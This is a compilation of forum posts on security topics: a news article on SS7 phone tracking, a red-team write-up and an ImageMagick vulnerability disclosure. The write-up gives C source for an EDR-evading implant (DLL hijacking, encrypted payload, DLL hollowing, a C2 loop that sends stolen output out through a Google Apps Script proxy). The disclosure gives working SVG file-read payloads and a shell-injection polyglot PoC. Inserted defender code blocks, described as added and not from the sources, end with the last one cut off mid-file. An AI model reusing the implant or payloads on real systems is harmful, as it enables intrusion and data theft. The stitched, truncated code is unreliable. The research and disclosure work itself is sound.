Everything posted by Nytro

  1. You buy one for $5 from DigitalOcean, Vultr or other VPS providers. You get the password by email or set it from the web interface, log in via SSH and start "hacking".
  2. This Surveillance Tool Can Find You With Just Your Telephone Number — And These 25 Countries Bought It, Warn Researchers

By Thomas Brewster, Forbes Staff (Cybersecurity; Associate editor at Forbes, covering cybercrime, privacy, security and surveillance)

A surveillance technology that can identify the location of a phone anywhere in the world in just seconds with only a telephone number has been sold to 25 countries, some with chequered records on human rights, according to research released Tuesday.

The tech was supplied by the Israeli business Circles, claimed Citizen Lab, a University of Toronto organization that has long tracked the activities of surveillance companies. Circles is a sister company of NSO Group, an iPhone and Android spyware developer that is currently being sued by Facebook over attacks on the WhatsApp accounts of 1,400 users and has been criticized for selling to nations who went on to spy on activists, journalists and other citizens.

According to Citizen Lab, the Circles tracking tool was detected in both Western, democratic countries, and nations with poor human rights records. The full list, according to Citizen Lab and neither confirmed nor denied by Circles, included: Australia, Belgium, Botswana, Chile, Denmark, Ecuador, El Salvador, Estonia, Equatorial Guinea, Guatemala, Honduras, Indonesia, Israel, Kenya, Malaysia, Mexico, Morocco, Nigeria, Peru, Serbia, Thailand, the United Arab Emirates (U.A.E.), Vietnam, Zambia, and Zimbabwe.

(Image caption) Technology made by Circles, an Israeli intelligence provider, can find a person's phone with just their number. As many as 25 countries use it, leading to concerns about ethics.

The technique used by the Circles snooping tech is known as Signaling System 7 (SS7) exploitation, a powerful yet difficult-to-detect tool in government spy arsenals. It’s named after the portion of the telecoms network that deals with cross-border functionality and billing.

When, for instance, you travel to another country, the SS7 network is used to move your phone over to a partner telecoms provider and adjust billing accordingly. But should a surveillance vendor have access to SS7 networks, either via hacking or acquiring it, they can send commands to a subscriber’s “home network” falsely indicating the subscriber is roaming. That will, in turn, reveal their location, though only the coordinates of the cell tower closest to the phone. It may also be possible to intercept calls and texts through SS7 exploitation, though Circles technology is only for location detection, according to two industry sources. (According to trademark filings, it does have a technology called PixCell for “tapping into or intercepting targets' wireless, telephone, computer, and internet communications.”)

If such a significant number of countries have bought access to the Circles tool, it would indicate that all can locate a phone, and its owner, at rapid speed. Marczak noted that one of the main selling points of the Circles tool was that it didn’t need cooperation from a telecoms company. If used by countries with lax rule of law and human rights controls, it could help repressive government surveillance agencies track targets across borders, without the need for a warrant, Citizen Lab researcher Bill Marczak warned.

Many of the countries listed as likely Circles customers have a track record of using surveillance tools against dissidents and activists, Citizen Lab claimed. Forbes previously revealed Circles’ sales to Mexico, whilst others had reported on deals with the U.A.E., where it was alleged the company’s tools were used to carry out surveillance on the Emir of Qatar and the prime minister of Lebanon. The U.A.E., for instance, allegedly targeted the now imprisoned activist Ahmed Mansoor with malware from at least three different companies - NSO Group included - before arresting him in 2017.

Mexico, meanwhile, “serially abused NSO Group’s Pegasus spyware” in targeting at least 25 reporters, human rights defenders, and the families of individuals killed or disappeared by cartels, according to previous Citizen Lab research. NSO has always stated that it works for legitimate government agencies on investigations into the worst kinds of crimes, and has an ethics committee that reviews contracts, though it cannot comment on the identity of its customers.

“Given Circles' affiliation with NSO Group, and repeated spyware abuse by NSO customers, it's disappointing to see Western governments patronizing the company,” added Marczak.

An NSO spokesperson gave Forbes a joint NSO and Circles response, stating: “NSO and Circles are separate companies within the same corporate family, both of which lead their industries in a commitment to ethical business and adhere to strict laws and regulations in every market in which they operate. As we have previously stated, Circles is involved in search and rescue and tactical geolocation technology.

“We cannot comment on a report we have not seen. Given Citizen Lab’s track record, we imagine this will once again be based on inaccurate assumptions and without a full command of the facts. As ever, we find ourselves being asked to comment on an unpublished report from an organization with a predetermined agenda.”

The spokesperson declined to comment on the countries listed by Citizen Lab as customers.

Citizen Lab said it tracked down Circles customers by looking for a unique “fingerprint” on servers across the globe that helped them identify where the spy tool was deployed. That fingerprint was built on numerous data points, most significantly a web domain that was linked to Circles business, according to the full technical report.

Spying in Circles

Circles was an independent intelligence agency vendor up until 2014, when it was acquired by private equity company Francisco Partners for $130 million and merged into a larger surveillance company. That umbrella organization also included NSO Group.

But Circles isn’t the only SS7 surveillance provider on the market. Cyprus-based Intellexa, set up by former Circles co-founder Tal Dilian, uses SS7 exploitation as one of its many tools to track a target. Israeli companies Verint, Rayzone and 1rstWAP offer similar services, according to one industry executive. Ability Inc., another Israeli firm, tried to take the tech global, but crashed out of the Nasdaq after failing to secure customers.

Those providers’ days should, in theory, be numbered, if they stick to solely doing SS7 attacks. The flaws that allow SS7 attacks to take place have long been fixable. The attacks are only possible because SS7, in its original form, doesn’t require any authentication to guarantee the legitimacy and safety of messages traversing the network. It would require some effort by global telecoms networks to address the flaws, but some efforts have been made to patch the vulnerabilities. The U.K., for instance, recently proposed telecommunications security legislation that would grant a regulator the authority to ensure the nation’s networks are secure against SS7 attacks. Nevertheless, whilst those gaping holes remain open across global networks, government spies can continue to track anyone, anywhere, with just their phone number.

Source: https://www.forbes.com/sites/thomasbrewster/2020/12/01/this-spy-tool-can-find-you-with-just-a-telephone-number-and-25-countries-own-it-warn-researchers/?sh=78620548331e
  3. DefCamp It's the final countdown for the #DefCamp #CTF! Only a few days left to sign up your team! We promise FUN, engagement, awesome prizes, and a memorable experience to add to your track record! Details + SIGN UP links below. https://dctf2020.cyberedu.ro/
  4. Hindering Threat Hunting, a tale of evasion in a restricted environment

Written by: Borja Merino, 24 November, 2020

It is both common and important for the development of a Red Team exercise to obtain information about the technologies and restrictions of the environment where our TTPs are going to be executed. This information mainly implies substantial changes in our modus operandi. Generally, one of these changes is to put aside known/public offensive tools and develop our own custom implants ad hoc for the customer’s ecosystem, at the initial stages of infection where the chances of detection are high.

The following case that we would like to share is a clear example of this type of exercise. In one of our clients, we did obtain information about the EDR (Endpoint Detection & Response) technology deployed and the network restrictions for outgoing connections, where only domains such as Google, Microsoft, etc. are allowed. After studying different approaches to bypass these restrictions, we proceeded to develop a custom implant with the necessary capabilities to reach the BlackArrow C&C and carry out various post-exploitation actions without being detected. The following diagram represents the steps performed by the implant:

Implant logic

Step 1: DLL Order Hijacking

It is known that the use of DLL Order Hijacking is still quite efficient not only against AVs but also against EDR technologies. It is no wonder that multiple actors have been using these evasion techniques for years. As an input vector for the exercise, we chose one of the binaries used in a recent campaign described by Dr.Web in its report “Study of the ShadowPad APT backdoor and its relation to PlugX”. Specifically, we used the legitimate binary TosBtKbd.exe signed by TOSHIBA CORPORATION that, as shown below, is susceptible to DLL order hijacking in its function 0x4024A0.

DLL Order Hijacking (TosBtKbd.exe)

As we can see in the image, the DLL “TosBtKbd.dll” is loaded, via LoadLibrary(), without specifying its full path, making it possible to load a harmful DLL. Notice that the SetTosBtKbdHook symbol is invoked immediately.

Step 2: RC4 Decryption (reflective PE)

Running TosBtKbd.exe will trigger the harmful actions through our DLL. The skeleton of this library is shown below.

    //#include "syscalls.h" //SysWhispers

    void __stdcall UnHookTosBtKbd(void) {}

    void __stdcall SetTosBtKbdHook(void)
    {
        char key[11];
        stale();
        //Get RC4 Key (TimeDateStamp DWORD value)
        DWORD ts = getKey();
        if (ts == NULL) return;
        sprintf_s(key, "%X", ts);
        DWORD dwCount;
        //Get encrypted shellcode from resource
        PCHAR exec = getResource(&dwCount);
        if (exec != NULL) {
            //Decrypt shellcode
            decrypt(key, exec, &dwCount);
            //Lazy check (reflective loading stub)
            if ((exec[1] == 'Z') && (exec[2] == 'E')) {
                uint8_t* pMapBuf = nullptr, * pMappedCode = nullptr;
                uint64_t qwMapBufSize;
                //Phantom DLL hollowing
                //Ref: github.com/forrest-orr/phantom-dll-hollower-poc
                //bTxF <-- (check NtCreateTransaction on the system)
                if (HollowDLL(&pMapBuf, &qwMapBufSize, (const uint8_t*)exec, dwCount, &pMappedCode, bTxF)) {
                    VirtualFree(exec, NULL, MEM_RELEASE);
                    //Less obvious indirect call
                    __asm {
                        mov eax, pMappedCode
                        push eax
                        ret
                    }
                }
            }
        }
    }

First of all, the stale() function is run. Its goal is to distract and confuse some machine learning checks and sandboxes that execute the DLL looking for malicious activity. By playing with the variable limit, we can get a delay of seconds/minutes before executing the malicious actions.

    double c(int num1) {
        return (16 / (num1 * pow(5.0, num1 * 1.0)));
    }

    double c1(int num1) {
        return (4 / (num1 * pow(249.0, num1 * 1.0)));
    }

    void stale() {
        // Stale code. Play with the "limit" var to look for a delay you feel happy with
        double limit = 100;
        int j = 0;
        double ans1 = 0.0;
        double ans2 = 0.0;
        int flag = 1;
        for (j = 1; j <= limit; j += 1) {
            if (flag == 1) {
                ans1 += c(j);
                ans2 += c1(j);
                flag = 0;
            } else {
                ans1 -= c(j);
                ans2 -= c1(j);
                flag = 1;
            }
        }
        printf("%f", ans1);
    }

Afterwards, an embedded resource in the DLL will be loaded and decrypted using the Windows CryptoAPI. This resource is a binary encrypted with RC4 that implements the main logic of the implant, that is, to establish communication with our C&C and execute post-exploitation actions.

Resource decryption (reflective PE)

It has been observed that some EDRs exclusively upload the unknown binaries to their cloud sandbox for analysis, which is why TosBtKbd.exe’s TimeDateStamp has been used as RC4 key. Using a key from a file header of the container process makes an analysis within the appropriate context necessary to recover the decrypted binary, which translates into more time for a hunter or malware analyst to obtain artifacts of interest such as, for example, the IP or domain of our C&C. The following image shows the creation of the reflective PE from the binary compiled from Visual Studio using pe_to_shellcode (developed by security researcher Hasherezade). Note that later the binary is encrypted with RC4 using TosBtKbd.exe’s TimeDateStamp.

Reflective PE generation (RC4 encryption)

Step 3: Phantom DLL

In order to make memory hunting more difficult and as an alternative to the most common injection techniques, Phantom DLL Hollowing has been used. Using this approach, created by the researcher Forrest Orr, it is possible to execute the binary within a +RX section, making it very difficult to detect using traditional tools based on RWX allocations or suspicious threads. In our case, the DLL used to make the phantom is aadauthhelper.dll, which was chosen based on the size of its .text section to house our reflective PE. You can notice the loader stub right at the beginning of that section (0x556C1000).

RX section (aadauthhelper.dll)

To start our implant’s execution, once the DLL hollowing has been done, the classical cast of a function pointer (call eax) has been replaced with a less obvious indirect call: push eax, ret.

    //Phantom DLL hollowing
    //Ref: github.com/forrest-orr/phantom-dll-hollower-poc
    //bTxF <-- (check NtCreateTransaction on the system)
    if (HollowDLL(&pMapBuf, &qwMapBufSize, (const uint8_t*)exec, dwCount, &pMappedCode, bTxF)) {
        VirtualFree(exec, NULL, MEM_RELEASE);
        //Less obvious indirect call
        __asm {
            mov eax, pMappedCode
            push eax
            ret
        }
    }

Step 4: C2 connections through Google Apps Script

Perhaps one of the trickiest parts of this exercise was the outgoing communications, as it was a specially controlled environment. Regarding various alternatives, such as Domain Fronting and similar techniques, we opted for something more “innovative”. In this context, we took an idea from a Forcepoint analysis on certain Carbanak TTPs where said actor abused Google Apps Script to send and receive commands. Instead of using said platform as a command and control server, its scripting capabilities would be used to configure a proxy that allows us to reach our C&C. It should be noted that there are various offensive tools that already take advantage of this platform in a very similar way to the initial idea raised by the Red Team/Threat Hunting team at BlackArrow. However, given the small number of real incidents that make use of these TTPs, it was considered that it could be the most appropriate approach to test the filtering capabilities of our target. The result has been the development of a binary in C that makes use of the approach described in the following graphic.

Connections through proxy (Google Apps Script)

At first, our implant will launch a GET request (via HTTPS) in which it will embed, in one of its parameters, the URL of the C&C. This URL will be extracted by Google Apps Script, which will act as an intermediary between the client’s communications and the control server. After receiving the first GET, our C&C will return a random 10-byte token to the client. This token ensures that the connection comes from a legitimate host. Periodically, the implant, via POST, will check for new jobs. The result of these jobs (ps, screenshot, getinfo, etc.) will be sent to our C&C encoded in base64. The code snippet below shows the main loop in charge of managing the collection and sending of the results associated with each job. The runJob() function will be responsible for executing, through a switch case, each of the control commands and returning the result encoded in base64.

    void C2_jobs(HINTERNET hConnect, TCHAR* urlPost)
    {
        DWORD dwBytesRead;
        TCHAR* token = new char[BUFSIZ + 1];
        const TCHAR* job = "/job";
        TCHAR jobvalue[JSIZE];
        TCHAR* urlJob, * urlTmp = NULL;
        payenc_t pEncoded;
        pEncoded.payenc = NULL;
        urlJob = concatenate((const TCHAR*)urlPost, (TCHAR*)"/job/");

        while (true) {
            Sleep(timer);
            HINTERNET hHttpFile = HttpOpenRequest(hConnect, "POST", urlPost, NULL, NULL, NULL, INTERNET_FLAG_SECURE, NULL);
            if (!HttpSendRequest(hHttpFile, NULL, NULL, NULL, NULL)) return;
            if (!InternetReadFile(hHttpFile, token, BUFSIZ + 1, &dwBytesRead)) return;
            if (dwBytesRead != 0) {
                token[dwBytesRead] = 0;
                if (sscanf_s(token, "job=%[^\n]", jobvalue, sizeof jobvalue) == 1) {
                    urlTmp = concatenate((const TCHAR*)urlJob, jobvalue);
                    pEncoded = runJob(jobvalue);
                    hHttpFile = HttpOpenRequest(hConnect, "POST", urlTmp, NULL, NULL, NULL, INTERNET_FLAG_SECURE, 0);
                    if (!HttpSendRequest(hHttpFile, NULL, 0, pEncoded.payenc, pEncoded.size)) return;
                    if (pEncoded.payenc != NULL) {
                        free(pEncoded.payenc);
                        pEncoded.payenc = NULL;
                    }
                    free(urlTmp);
                    memset(jobvalue, '\0', JSIZE);
                }
            }
        }
    }

The following code was used to manage connections in the Google Apps Script proxy configuration:

    function doGet(e) {
      var url = decodeURIComponent(e.parameter.url);
      try {
        var response = UrlFetchApp.fetch(url);
      } catch (e) {
        return e.toString();
      }
      var cookie = response.getAllHeaders()['Set-Cookie'];
      return ContentService.createTextOutput(cookie);
    }

    function doPost(e) {
      Logger.log('[+] Post Done!');
      payload = "";
      if (e.postData) {
        payload = e.postData.getDataAsString();
      } else {
        Logger.log("[-] Post Error :(");
        payload = "!!Error";
      }
      var options = {
        'method' : 'post',
        'payload' : payload
      };
      var url = decodeURIComponent(e.parameter.url);
      try {
        var response = UrlFetchApp.fetch(url, options);
      } catch (e) {
        return e.toString();
      }
      Logger.log('UrlFetch Response: %s', response);
      return ContentService.createTextOutput(response.getContentText());
    }

As we can see in the following image, the client, from the TosBtKbd.exe address space or, to be more exact, from the mapped view (image memory) linked with aadauthhelper.dll, will communicate with the script.google.com service, allowing us to bypass the organization’s filtering countermeasures.

Memory / Connections

In the C&C part, a simple Python service was developed to manage the listeners and the various post-exploitation tasks.

C&C server

Below is a video of one of the proofs of concept run on Windows 10 2004.

Source: https://www.blackarrow.net/hindering-threat-hunting-a-tale-of-evasion-in-a-restricted-environment/
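As an added example (not code from the BlackArrow post), the following Python script shows what a defender can extract from the traffic shape described above: requests to script.google.com whose `url` query parameter forwards to an external host, grouped per client, with the GET-then-POST beaconing pattern flagged. The proxy-log format (`client method url status`), the deployment ids and the `.invalid` hostname are constructed for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log (not from the article): "client method url status".
# The deployment ids and the .invalid hostname are placeholders.
SAMPLE_LOG = """\
10.0.0.12 GET https://script.google.com/macros/s/AKfyc_EXAMPLE/exec?url=https%3A%2F%2Fc2.example.invalid%2Freg 200
10.0.0.12 POST https://script.google.com/macros/s/AKfyc_EXAMPLE/exec?url=https%3A%2F%2Fc2.example.invalid%2Fjob 200
10.0.0.33 GET https://docs.google.com/document/d/abc/edit 200
10.0.0.41 GET https://script.google.com/macros/s/AKfyc_OTHER/exec?name=report 200
10.0.0.12 POST https://script.google.com/macros/s/AKfyc_EXAMPLE/exec?url=https%3A%2F%2Fc2.example.invalid%2Fjob%2Fscreenshot 200
"""

APPS_SCRIPT_HOST = "script.google.com"


def forwarded_url(request_url):
    """Return the decoded `url` query parameter of an Apps Script request, else None.
    The proxy script in the post reads e.parameter.url and fetches it server-side,
    so this parameter is where the real destination is visible to the proxy log."""
    parts = urlsplit(request_url)
    if parts.hostname != APPS_SCRIPT_HOST:
        return None
    values = parse_qs(parts.query).get("url")
    return values[0] if values else None


def summarise(log_text, allowed_hosts=frozenset()):
    """Group proxied requests by (client, forwarded host), skipping known-good hosts."""
    findings = {}
    for line in log_text.splitlines():
        client, method, url, _status = line.split()
        target = forwarded_url(url)
        if target is None:
            continue
        host = urlsplit(target).hostname or ""
        if host in allowed_hosts:
            continue
        entry = findings.setdefault(
            (client, host), {"count": 0, "methods": set(), "paths": set()}
        )
        entry["count"] += 1
        entry["methods"].add(method)
        entry["paths"].add(urlsplit(target).path)
    return findings


def suspicious(findings):
    """Flag clients that both registered (GET) and later posted (POST) through the
    same proxied host: the registration-then-job-polling shape the post describes."""
    return sorted(key for key, e in findings.items() if {"GET", "POST"} <= e["methods"])
```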
  5. ImageMagick - Shell injection via PDF password "Use ImageMagick® to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, GIF, HEIC, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG [ and many more ]"1 In 2016 ImageTragick was revealed. The associated reseachers showed that ImageMagick is not only powerful, eg you can read local files, but that it is possible to execute shell commands via a maliciously crafted image. In late 2016 and in 2018 Tavis Ormandy (@taviso) showed how the support of external programs ( ghostscript) in ImageMagick could lead to remote execution. Given the past research I had a quick look at the supported external programs (libreoffice/openoffice I already spent quite some time on), and I decided to get a proper understanding how IM (ImageMagick) calls external programs and the way they fixed the shell injections in the ImageTragick report. As you are reading this blogpost, it paid off and I found a vulnerability. But I also learned two things: Note: 1) The IM team is really active and is trying to address any issue raised quickly (thats important later) 2) ImageMagick is an awesome tool to convert files. It supports some really weird old file types (often via external programs) and is trying to be as user friendly as possible, maybe a little too much ^^ The Fix: ImageMagick, https and cURL An important part of ImageMagick and how it handles files is not solely the infamous delegates.xml file but the coders folder. The delegates.xml file specifies the commands and parameters to call an external program to handle a certain file type. 
But before that the handlers in the aforementioned coders folders are used to parse a file and determine if an external program needs to be called (this is a simplification but in most cases it works this way) As there are lot of files in coders, I decided to check how https: URLs are handled by ImageMagick as I already knew curl will be used in the end, which was vulnerable to command injection. To keep it short - the https: handler is registered in this line: https://github.com/ImageMagick/ImageMagick/blob/master/coders/url.c#L327 In case IM has to handle https: URLs - the following branch is called: https://github.com/ImageMagick/ImageMagick/blob/master/coders/url.c#L157 status=InvokeDelegate(read_info,image,"https:decode",(char *) NULL, InvokeDelegate calls InterpretDelegateProperties, which calls GetMagickPropertyLetter, which calls SanitizeDelegateString. whitelist[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 " "$-_.+!;*(),{}|\\^~[]`\"><#%/?:@&="; [...] for (p+=strspn(p,whitelist); p != q; p+=strspn(p,whitelist)) *p='_'; return(sanitize_source); This function basically replaces ' (single quotes) with "_" on non-windows system (which I assume as the default). This is important as in the end ExternalDelegateCommand is called. This function handles calling external executables. The defined curl command in delegates.xml is used and the user defined URL is included in single quotes. As single quotes were filtered before, it is not possible to inject additional shell commands. I verified that by modifying the source code of IM and included some printf statements to dump the created command. 
So let's assume a SVG or MVG (an example is available in ImageTragick) that specifies an https: URL like this: <svg width="200" height="200" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="https://example.com/test'injection" height="200" width="200"/> </svg> Command line: convert test.svg out.png The created shell command by ImageMagick looks like this: curl -s -k -L -o 'IMrandomnumber.dat' 'https://example.com/test_injection' Important Note: As shown by this example, different coders can call each other as in this case SVG triggers the execution of the url.c coder. In case ImageMagick is compiled to use a third-party library like librsvg to parse SVG files, the third party library handles protocols by itself. In this scenario it is still possible to trigger ImageMagicks own SVG parsers via the MSVG support ("ImageMagick's own SVG internal renderer"): convert test.msvg out.png ImageMagick also allows to set a specific handler via this syntax: convert msvg:test.svg out.png Short intermission - reading local files As ImageMagick allows to set specific file handlers as shown above, I decided to make a quick assessment, which handlers could allow to read and leak local files. My test case assumed that a user controlled SVG file is converted by IMs internal SVG parser to a PNG file, which is returned to the end user afterwards. An example could be an avatar upload on a website. convert test.svg userfile.png The first powerful coder is already mentioned in ImageTragick - text:. 'The "text:" input format is designed to convert plain text into images consisting one image per page of text. It is the 'paged text' input operator of ImageMagick.'. The coder is registered in txt.c. <svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="text:/etc/passwd" height="500" width="500"/> </svg> Another example to read /etc/passwd is based on LibreOffice. 
This is possible as LibreOffice supports the rendering of a text file. As ImageMagick has no support for this file type, the corresponding protocol handler can be found via the decode property in delegates.xml. This vector only works of course when OpenOffice/LibreOffice is installed: <svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="odt:/etc/passwd" height="500" width="500"/> </svg> It is also possible to use html: - in case html2ps is installed. Although ImageMagick registers a "HTML" handler, it only sets an encoder entry. Encoders only handle the creation/writing but not reading (this is done by the decoders) of the file type. Therefore the decoder in delegates.xml is used: <svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="html:/etc/passwd" height="500" width="500"/> </svg> This is not an exhausted list but should document the general idea. Back to the shell injection. Entry Point - Encrypted PDFs After I got an understanding of the usage of curl, I checked again the command defined in delegates.xml: <delegate decode="https:decode" command="&quot;@WWWDecodeDelegate@&quot; -s -k -L -o &quot;%u.dat&quot; &quot;https:%M&quot;"/> %M is replaced with the user-controlled URL. Therefore, I checked all occurrences of %M and if they are handled correctly. Additionally I had a look at all the defined replacement values defined in property.c. In the end nothing yielded a proper injection vulnerability. Then I stumbled upon the following line in the pdf.c coder: (void) FormatLocaleString(passphrase,MagickPathExtent, "\"-sPDFPassword=%s\" ",option); As this seemed to set a password, which is most likely fully user controlled, I looked up how this parameter can be set and if it could be abused. 
Based on the changelog, ImageMagick added a "-authenticate" command line parameter in 2017 to allow users to set a password for encrypted PDFs. So, I tested it via the following command to dump the created command: convert -authenticate "password" test.pdf out.png Shell command created: 'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' "-sPDFPassword=password" '-sOutputFile=/tmp/magick-YPvcqDeC7K-Q8xn8VZPwHcp3G1WVkrj7%d' '-f/tmp/magick-sxCQc4-ip-mnuSAhGww-6IFnRQ46CBpD' '-f/tmp/magick-pU-nIhxrRulCPVrGEJ868knAmRL8Jfw9' As I confirmed that the password is included in the created gs command, which parses the specified PDF, it was time to check if double quotes are handled correctly: convert -authenticate 'test" FFFFFF' test.pdf out.png 'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' "-sPDFPassword=test" FFFFFF" '-sOutputFile=/tmp/magick-YPvcqDeC7K-Q8xn8VZPwHcp3G1WVkrj7%d' '-f/tmp/magick-sxCQc4-ip-mnuSAhGww-6IFnRQ46CBpD' '-f/tmp/magick-pU-nIhxrRulCPVrGEJ868knAmRL8Jfw9 To my surprise I was able to prematurely close the -sPDFPassword parameter, which allows me to include additional shell commands. The specified "password" has to contain one of the following characters "&;<>|" so the shell injection gets actually triggered. 
The reason being that ImageMagick will only use the system call (and therefore the system shell) in case one of these characters is present: if ((asynchronous != MagickFalse) || (strpbrk(sanitize_command,"&;<>|") != (char *) NULL)) status=system(sanitize_command); Putting alltogether I tested the following command: convert -authenticate 'test" `echo $(id)> ./poc`;"' test.pdf out.png Shell command created: 'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' "-sPDFPassword=test" `echo $(id)> ./poc`;"" '-sOutputFile=/tmp/magick-pyNxb2vdkh_8Avwvw0OlVhu2EfI3wSKl%d' '-f/tmp/magick-IxaYR7GhN3Sbz-299koufEXO-ccxx46u' '-f/tmp/magick-GXwZIbtEu63vyLALFcqHd2c0Jr24iitE' The file "poc" was created and it contained the output of the id command. At this point I had a confirmed shell injection vulnerability. The problem was: It is unlikely that a user has the possibility to set the authenticate parameter. So I decided to look for a better PoC: Explotation - MSL and Polyglots I needed to find a way to set the "-authenticate" parameter via a supported file type and I already knew where to look at: ImageMagick Scripting Language (MSL). This is a XML based file format supported by ImageMagick, which allows to set the input file, output file and additional parameters. An example file can be found here - I simplified it a bit: <?xml version="1.0" encoding="UTF-8"?> <image> <read filename="image.jpg" /> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="image.png" /> </image> This file format is not properly documented, which is mentioned by the ImageMagick team, so I checked the source code regarding the supported attributes. 
I quickly discovered the following line in the source code of the MSL coder: if (LocaleCompare(keyword,"authenticate") == 0) { (void) CloneString(&image_info->density,value); break; } Via additional debug calls I verified that this path handles any tag, which sets the authenticate attribute. But the code assigns the defined value to the density property, which made no sense. After studying the rest of the MSL code I came to the following conclusion: 1) This code should set the authenticate attribute similar to the "-authenticate" command line parameter. 2) The code was simply wrong and therefore blocking the possibility to abuse the shell injection. So I decided to do something I haven't done before: Mention this problem via Github and see if it gets fixed (I created a new github account for that) - https://github.com/ImageMagick/ImageMagick/discussions/2779 In the end the code was fixed correctly: if (LocaleCompare(keyword,"authenticate") == 0) { (void) SetImageOption(image_info,keyword,value); break; } I immediately created a PoC MSL script to verify I could abuse the shell injection. Note that it is necessary to specify the msl: protocol handler so IM actually parses the script file correctly: <?xml version="1.0" encoding="UTF-8"?> <image authenticate='test" `echo $(id)> ./poc`;"'> <read filename="test.pdf" /> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="out.png" /> </image> convert msl:test.msl whatever.png And it worked - the "poc" file was created, proofing the shell injection. Last step: Wrap this all up in one SVG polyglot file. SVG MSL polyglot file: My created polyglot file is a SVG file, which loads itself as an MSF file to trigger the shell injection vulnerability. 
I will start showing the SVG polyglot file and explain its structure: poc.svg: <image authenticate='ff" `echo $(id)> ./0wned`;"'> <read filename="pdf:/etc/passwd"/> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="test.png" /> <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image xlink:href="msl:poc.svg" height="100" width="100"/> </svg> </image> First of all the SVG structure has an image root tag. As the parser does not enforce that the SVG tag is the root tag, IM has no problems parsing this file as a SVG. The SVG structure specifies an image URL, which uses msl:poc.svg. This tells ImageMagick to load poc.svg with the MSL coder. Although MSF is a XML based structure, the MSF coder does not deploy a real XML parser. It only requires that the file starts with a tag it supports. Another trick I used is present in the read tag. It is necessary to target a PDF file to trigger the vulnerability. To bypass this necessity, I specified any known local file and used the pdf: protocol handler to ensure it is treated as a PDF: PoC file in action: The PoC is still not perfect as I have to assume the filename does not get changed as the file has to be able to reference itself. But I decided thats good enough for now. PreConditions and protection Obviously this vulnerable only works in case ImageMagick is not compiled with a third-party library, which handles PDF parsing. Also a user has to be able to set the "authenticate" parameter, either via the command line or via MSL (as shown in my PoC file). In case ImageMagick must not handle PDF files, it is possible to disable the PDF coder via the policy.xml file therefore preventing the shell injection. How to configure policy.xml is already documented by https://imagetragick.com/ (just include "PDF"). 
Affected versions:

- Injection via "-authenticate"
  - ImageMagick 7: 7.0.5-3 up to 7.0.10-40
- Exploitation via MSL:
  - ImageMagick 7: 7.0.10-35 up to 7.0.10-40

Regarding ImageMagick 6 (aka legacy): based on the source code the following versions should be vulnerable.

- Injection via "-authenticate"
  - ImageMagick 6: 6.9.8-1 up to 6.9.11-40
- Exploitation via MSL:
  - ImageMagick 6: 6.9.11-35 up to 6.9.11-40

I focused my testing solely on ImageMagick 7 so I tried ImageMagick 6 really late. It seems the "-authenticate" feature is broken in the legacy branch. But during testing my VM died so I leave it to the readers to create a PoC for ImageMagick 6 (or maybe I will do it as soon as I have some free time).

Timeline:

- 2020-11-01: Reported the vuln to ZDI
- 2020-11-16: Didn't want to wait for any response from ZDI so reported the issue to ImageMagick
- 2020-11-16: ImageMagick deployed a fix and asked me if I could wait for disclosure, as there is a release planned for this weekend.
- 2020-11-16 to 2020-11-20: Discussed the fix with the ImageMagick team.
- 2020-11-21: Version 7.0.10-40 and 6.9.11-40 released.

I want to thank the ImageMagick developers. They try to address and fix any issues raised as quickly as possible (feature or security related, doesn't matter). Additionally they allowed me to provide input on how I would address the issue (which is not always accepted^^).

Posted by Alex Inführ at 4:35 AM
Source: https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
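A defender-side check for the polyglot traits the post describes, as an added example that is not code from the post or from ImageMagick: it scans an SVG for a non-svg root element, references routed through the msl: or pdf: coders, and an authenticate attribute carrying shell metacharacters (the coder list and the benign sample are assumptions; the PoC sample is the poc.svg from the post).

```python
"""Scan an SVG for the traits of the SVG/MSL polyglot described above.

Regular expressions are used on purpose: the MSL coder does not use a real
XML parser, so a strict parser would reject exactly the files that matter.
"""
import re

# Reproduced from the poc.svg shown in the post.
POC_SVG = """<image authenticate='ff" `echo $(id)> ./0wned`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
"""

# Constructed benign SVG for comparison.
BENIGN_SVG = """<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="10" height="10">
<image xlink:href="data:image/png;base64,AAAA" width="10" height="10"/>
</svg>
"""

INTERNAL_CODERS = {"msl", "pdf"}          # assumption: the two coders used in the PoC; extend as needed
REFERENCE_ATTRS = {"href", "xlink:href", "filename"}
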